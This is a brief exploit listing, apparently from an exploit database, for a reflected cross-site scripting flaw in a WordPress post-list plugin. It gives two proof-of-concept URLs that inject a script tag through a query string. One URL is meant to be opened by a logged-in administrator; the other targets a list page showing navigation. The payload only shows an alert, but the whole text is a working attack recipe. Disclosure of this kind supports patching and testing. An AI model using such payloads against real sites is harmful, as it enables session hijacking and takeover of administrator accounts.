## https://sploitus.com/exploit?id=WPEX-ID:FA38F3E6-E04C-467C-969B-0F6736087589
Make a logged in admin open https://example.com/wp-admin/edit.php?post_type=w4pl&page=w4pl-docs&a"><script>alert(/XSS/)</script>
On a page where there is a list with navigation displayed (put a [nav] in the template of the list) output, append the following payload: a"><script>alert(/XSS/)</script>, example: https://example.com/list/w4-post-list-1/?a"><script>alert(/XSS/)</script>